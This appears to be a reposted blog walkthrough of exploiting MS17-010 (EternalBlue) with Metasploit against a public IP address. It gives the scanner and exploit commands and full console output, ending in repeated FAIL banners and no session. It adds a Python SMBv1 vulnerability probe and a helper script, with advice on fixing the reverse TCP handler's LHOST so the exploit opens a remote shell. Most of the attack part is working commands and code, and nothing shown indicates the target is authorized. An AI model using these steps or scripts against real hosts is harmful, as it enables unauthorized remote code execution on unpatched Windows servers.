  • MS17-010 penetration test procedure

    Commands used

    search ms17-010
    use auxiliary/scanner/smb/smb_ms17_010
    show options
    set RHOSTS 47.92.84.135
    run
    use exploit/windows/smb/ms17_010_eternalblue
    show options
    set RHOSTS 47.92.84.135
    exploit
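
    What the scanner step is actually testing, shown here as an added example rather than code from the original post or from Metasploit. The smb_ms17_010 module opens an anonymous SMBv1 session, connects to the IPC$ share and sends an SMB_COM_TRANSACTION whose setup words request PeekNamedPipe on FID 0. A server still missing MS17-010 answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205); a patched server answers STATUS_INVALID_HANDLE or STATUS_ACCESS_DENIED. The script below performs only that check (the module's CHECK_ARCH and CHECK_DOPU probes are not reproduced); the host is whatever is passed to probe(), and the packet layouts follow MS-CIFS, not any Metasploit source.

```python
"""MS17-010 probe (added example; not code from the original post or from Metasploit).
Reproduces the core check of auxiliary/scanner/smb/smb_ms17_010: anonymous SMBv1
session -> IPC$ tree connect -> SMB_COM_TRANSACTION carrying a PeekNamedPipe on
FID 0, then classify the NT status the server returns."""
import socket
import struct

SMB_COM_TRANSACTION, SMB_COM_NEGOTIATE = 0x25, 0x72
SMB_COM_SESSION_SETUP_ANDX, SMB_COM_TREE_CONNECT_ANDX = 0x73, 0x75
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205  # returned by unpatched hosts
STATUS_INVALID_HANDLE = 0xC0000008           # patched hosts return one of these
STATUS_ACCESS_DENIED = 0xC0000022


def smb_header(command, tid=0, uid=0, mid=0x41, status=0):
    # 32-byte SMBv1 header.  Flags 0x18 = canonical, case-insensitive paths;
    # Flags2 0x4001 = long names + 32-bit NT_STATUS (OEM strings, no extended
    # security, so session setup is a single round trip).
    return struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", command, status, 0x18,
                       0x4001, 0, b"\x00" * 8, 0, tid, 0, uid, mid)

def netbios(smb):
    # NetBIOS session service framing: type 0x00 + 3-byte big-endian length.
    return b"\x00" + struct.pack(">I", len(smb))[1:] + smb

def negotiate_request():
    dialect = b"\x02NT LM 0.12\x00"
    return smb_header(SMB_COM_NEGOTIATE) + b"\x00" + struct.pack("<H", len(dialect)) + dialect

def session_setup_request():
    # WordCount 13.  Zero-length OEM/Unicode passwords plus an empty account name
    # ask for an anonymous (null) session; Capabilities 0x40 = CAP_STATUS32.
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 0xFFFF, 2, 0, 0, 0, 0, 0, 0x40)
    body = b"\x00\x00\x00\x00"  # AccountName, PrimaryDomain, NativeOS, NativeLanMan
    return smb_header(SMB_COM_SESSION_SETUP_ANDX) + b"\x0d" + words + struct.pack("<H", len(body)) + body

def tree_connect_request(uid, host):
    # WordCount 4; a one-byte password, the IPC$ UNC path, wildcard service type.
    body = b"\x00" + ("\\\\%s\\IPC$" % host).encode() + b"\x00?????\x00"
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)
    return smb_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid) + b"\x04" + words + struct.pack("<H", len(body)) + body

def peek_named_pipe_request(uid, tid):
    # WordCount 16 = 14 fixed words + 2 setup words (0x23 PeekNamedPipe, FID 0).
    # Parameter/data offsets point just past the name:
    # 32 header + 1 wordcount + 32 words + 2 bytecount + 7 name = 0x4A.
    name = b"\\PIPE\\\x00"
    off = 32 + 1 + 32 + 2 + len(name)
    words = struct.pack("<HHHHBBHIHHHHHBBHH", 0, 0, 0xFFFF, 0xFFFF, 0, 0, 0, 0,
                        0, 0, off, 0, off, 2, 0, 0x23, 0)
    return smb_header(SMB_COM_TRANSACTION, tid=tid, uid=uid) + b"\x10" + words + struct.pack("<H", len(name)) + name

def parse_smb_header(pkt):
    # Return (command, nt_status, tid, uid, mid) from a NetBIOS-framed SMBv1 reply.
    if len(pkt) < 36 or pkt[4:8] != b"\xffSMB":
        raise ValueError("not an SMBv1 reply")
    command, status = struct.unpack_from("<BI", pkt, 8)
    tid, _pid, uid, mid = struct.unpack_from("<HHHH", pkt, 28)
    return command, status, tid, uid, mid

def classify(status):
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if status in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return "PATCHED"
    return "UNKNOWN (0x%08X)" % status

def probe(host, port=445, timeout=5.0):
    """Run the four-message exchange against host:port and return the verdict."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        def recv_exact(n):
            buf = b""
            while len(buf) < n:
                chunk = sock.recv(n - len(buf))
                if not chunk:
                    raise ConnectionError("peer closed the connection")
                buf += chunk
            return buf

        def xchg(smb):
            sock.sendall(netbios(smb))
            hdr = recv_exact(4)
            return parse_smb_header(hdr + recv_exact(int.from_bytes(hdr[1:], "big")))

        _, st, _, _, _ = xchg(negotiate_request())
        if st:
            raise RuntimeError("negotiate failed: 0x%08X" % st)
        _, st, _, uid, _ = xchg(session_setup_request())
        if st:
            raise RuntimeError("anonymous session setup refused: 0x%08X" % st)
        _, st, tid, _, _ = xchg(tree_connect_request(uid, host))
        if st:
            raise RuntimeError("IPC$ tree connect refused: 0x%08X" % st)
        return classify(xchg(peek_named_pipe_request(uid, tid))[1])

if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1]))
```

    Call probe("47.92.84.135") to reproduce the scanner's verdict; the module's "Host is likely VULNERABLE" line is this same status code, decorated with the NativeOS banner taken from the session setup reply. If the server refuses the NT LM 0.12 dialect or the anonymous session, SMBv1 or null sessions are disabled and the check does not apply, which is a different finding from "patched".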
    

    Details

    msf5 > search ms17-010

    Matching Modules
    ================

       #  Name                                           Disclosure Date  Rank     Check  Description
       -  ----                                           ---------------  ----     -----  -----------
       0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
       1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
       2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
       3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
       4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

    msf5 > use auxiliary/scanner/smb/smb_ms17_010
    msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

    Module options (auxiliary/scanner/smb/smb_ms17_010):

       Name         Current Setting                                                 Required  Description
       ----         ---------------                                                 --------  -----------
       CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
       CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
       CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
       NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
       RHOSTS                                                                       yes       The target address range or CIDR identifier
       RPORT        445                                                             yes       The SMB service port (TCP)
       SMBDomain    .                                                               no        The Windows domain to use for authentication
       SMBPass                                                                      no        The password for the specified username
       SMBUser                                                                      no        The username to authenticate as
       THREADS      1                                                               yes       The number of concurrent threads

    msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 47.92.84.135
    RHOSTS => 47.92.84.135
    msf5 auxiliary(scanner/smb/smb_ms17_010) > run

    [+] 47.92.84.135:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1
    [*] 47.92.84.135:445 - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
    msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

    Module options (exploit/windows/smb/ms17_010_eternalblue):

       Name           Current Setting  Required  Description
       ----           ---------------  --------  -----------
       RHOSTS                          yes       The target address range or CIDR identifier
       RPORT          445              yes       The target port (TCP)
       SMBDomain      .                no        (Optional) The Windows domain to use for authentication
       SMBPass                         no        (Optional) The password for the specified username
       SMBUser                         no        (Optional) The username to authenticate as
       VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
       VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

    Exploit target:

       Id  Name
       --  ----
       0   Windows 7 and Server 2008 R2 (x64) All Service Packs

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 47.92.84.135
    RHOSTS => 47.92.84.135
    msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

    [*] Started reverse TCP handler on 172.17.0.2:4444
    [+] 47.92.84.135:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1
    [*] 47.92.84.135:445 - Connecting to target for exploitation.
    [+] 47.92.84.135:445 - Connection established for exploitation.
    [+] 47.92.84.135:445 - Target OS selected valid for OS indicated by SMB reply
    [*] 47.92.84.135:445 - CORE raw buffer dump (53 bytes)
    [*] 47.92.84.135:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
    [*] 47.92.84.135:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris
    [*] 47.92.84.135:445 - 0x00000020  65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  e 7601 Service P
    [*] 47.92.84.135:445 - 0x00000030  61 63 6b 20 31                                   ack 1
    [+] 47.92.84.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply
    [*] 47.92.84.135:445 - Trying exploit with 12 Groom Allocations.
    [*] 47.92.84.135:445 - Sending all but last fragment of exploit packet
    [*] 47.92.84.135:445 - Starting non-paged pool grooming
    [+] 47.92.84.135:445 - Sending SMBv2 buffers
    [+] 47.92.84.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
    [*] 47.92.84.135:445 - Sending final SMBv2 buffers.
    [*] 47.92.84.135:445 - Sending last fragment of exploit packet!
    [*] 47.92.84.135:445 - Receiving response from exploit packet
    [+] 47.92.84.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
    [*] 47.92.84.135:445 - Sending egg to corrupted connection.
    [*] 47.92.84.135:445 - Triggering free of corrupted buffer.
    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [*] 47.92.84.135:445 - Connecting to target for exploitation.
    [+] 47.92.84.135:445 - Connection established for exploitation.
    [+] 47.92.84.135:445 - Target OS selected valid for OS indicated by SMB reply
    [*] 47.92.84.135:445 - CORE raw buffer dump (53 bytes)
    [*] 47.92.84.135:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
    [*] 47.92.84.135:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris
    [*] 47.92.84.135:445 - 0x00000020  65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  e 7601 Service P
    [*] 47.92.84.135:445 - 0x00000030  61 63 6b 20 31                                   ack 1
    [+] 47.92.84.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply
    [*] 47.92.84.135:445 - Trying exploit with 17 Groom Allocations.
    [*] 47.92.84.135:445 - Sending all but last fragment of exploit packet
    [*] 47.92.84.135:445 - Starting non-paged pool grooming
    [+] 47.92.84.135:445 - Sending SMBv2 buffers
    [+] 47.92.84.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
    [*] 47.92.84.135:445 - Sending final SMBv2 buffers.
    [*] 47.92.84.135:445 - Sending last fragment of exploit packet!
    [*] 47.92.84.135:445 - Receiving response from exploit packet
    [+] 47.92.84.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
    [*] 47.92.84.135:445 - Sending egg to corrupted connection.
    [*] 47.92.84.135:445 - Triggering free of corrupted buffer.
    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [*] 47.92.84.135:445 - Connecting to target for exploitation.
    [+] 47.92.84.135:445 - Connection established for exploitation.
    [+] 47.92.84.135:445 - Target OS selected valid for OS indicated by SMB reply
    [*] 47.92.84.135:445 - CORE raw buffer dump (53 bytes)
    [*] 47.92.84.135:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
    [*] 47.92.84.135:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris
    [*] 47.92.84.135:445 - 0x00000020  65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  e 7601 Service P
    [*] 47.92.84.135:445 - 0x00000030  61 63 6b 20 31                                   ack 1
    [+] 47.92.84.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply
    [*] 47.92.84.135:445 - Trying exploit with 22 Groom Allocations.
    [*] 47.92.84.135:445 - Sending all but last fragment of exploit packet
    [*] 47.92.84.135:445 - Starting non-paged pool grooming
    [+] 47.92.84.135:445 - Sending SMBv2 buffers
    [+] 47.92.84.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
    [*] 47.92.84.135:445 - Sending final SMBv2 buffers.
    [*] 47.92.84.135:445 - Sending last fragment of exploit packet!
    [*] 47.92.84.135:445 - Receiving response from exploit packet
    [+] 47.92.84.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
    [*] 47.92.84.135:445 - Sending egg to corrupted connection.
    [*] 47.92.84.135:445 - Triggering free of corrupted buffer.
    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [*] Exploit completed, but no session was created.
    msf5 exploit(windows/smb/ms17_010_eternalblue) >
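
    One thing the log above does not comment on: the handler was started on 172.17.0.2:4444, a private address in the range Docker's default bridge network uses, while the target 47.92.84.135 is a public address. A reverse TCP payload running on that host would try to connect back to 172.17.0.2 and never arrive, so "Exploit completed, but no session was created" is exactly what you would see even if the kernel overwrite itself worked (the module prints the FAIL banner whenever no session shows up after the egg is triggered, then retries with more groom allocations). Whether that was the cause here cannot be proven from the output, but it is the first thing to rule out before blaming pool grooming. The helper below is an added example, not code from the post or from Metasploit: it checks an LHOST/RHOST pair for this kind of mismatch and emits the set commands for a reachable handler; egress_address() assumes the machine running it has an IPv4 route to the target.

```python
"""Reverse-handler address sanity check (added example; not from the original
post or from Metasploit).  Flags an LHOST that a payload on RHOST could never
reach, such as a Docker bridge address used against an Internet target."""
import ipaddress
import socket


def lhost_verdict(lhost, rhost):
    """Return (ok, reason); ok is False when a payload running on rhost could
    not plausibly connect back to lhost."""
    l, r = ipaddress.ip_address(lhost), ipaddress.ip_address(rhost)
    if l.version != r.version:
        return False, "LHOST %s and RHOST %s are different address families" % (lhost, rhost)
    if l.is_loopback or l.is_unspecified or l.is_link_local:
        return False, "LHOST %s is not routable from any remote host" % lhost
    if l.is_private and r.is_global:
        return False, ("LHOST %s is a private address but RHOST %s is on the public "
                       "Internet; set LHOST to your public address, or to the NAT "
                       "address that forwards to this listener" % (lhost, rhost))
    return True, "LHOST %s is plausibly reachable from %s" % (lhost, rhost)


def egress_address(rhost, port=445):
    """Local address the OS would source traffic to rhost from.  Connecting a
    UDP socket sends no packet; it only consults the routing table."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.connect((rhost, port))
        return s.getsockname()[0]


def preflight(rhost, lhost=None, lport=4444):
    """Validate (or pick) LHOST and return msfconsole 'set' lines for the handler.
    A failed verdict is appended as a comment so it is visible when pasted."""
    lhost = lhost or egress_address(rhost)
    ok, reason = lhost_verdict(lhost, rhost)
    lines = ["set RHOSTS %s" % rhost, "set LHOST %s" % lhost, "set LPORT %d" % lport]
    if not ok:
        lines.append("# %s" % reason)
    return ok, lines


if __name__ == "__main__":
    # The pair from the run above: Docker bridge handler, public target.
    for line in preflight("47.92.84.135", lhost="172.17.0.2")[1]:
        print(line)
```

    When the listener really does run inside a container, set LHOST to the public or NAT address the target can reach and set the payload's advanced option ReverseListenerBindAddress to the container's own address, so the handler binds where the forwarded traffic lands; otherwise the overwrite can succeed in memory and msfconsole will still report no session.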

  • Original article: https://www.cnblogs.com/liuhuan086/p/13068752.html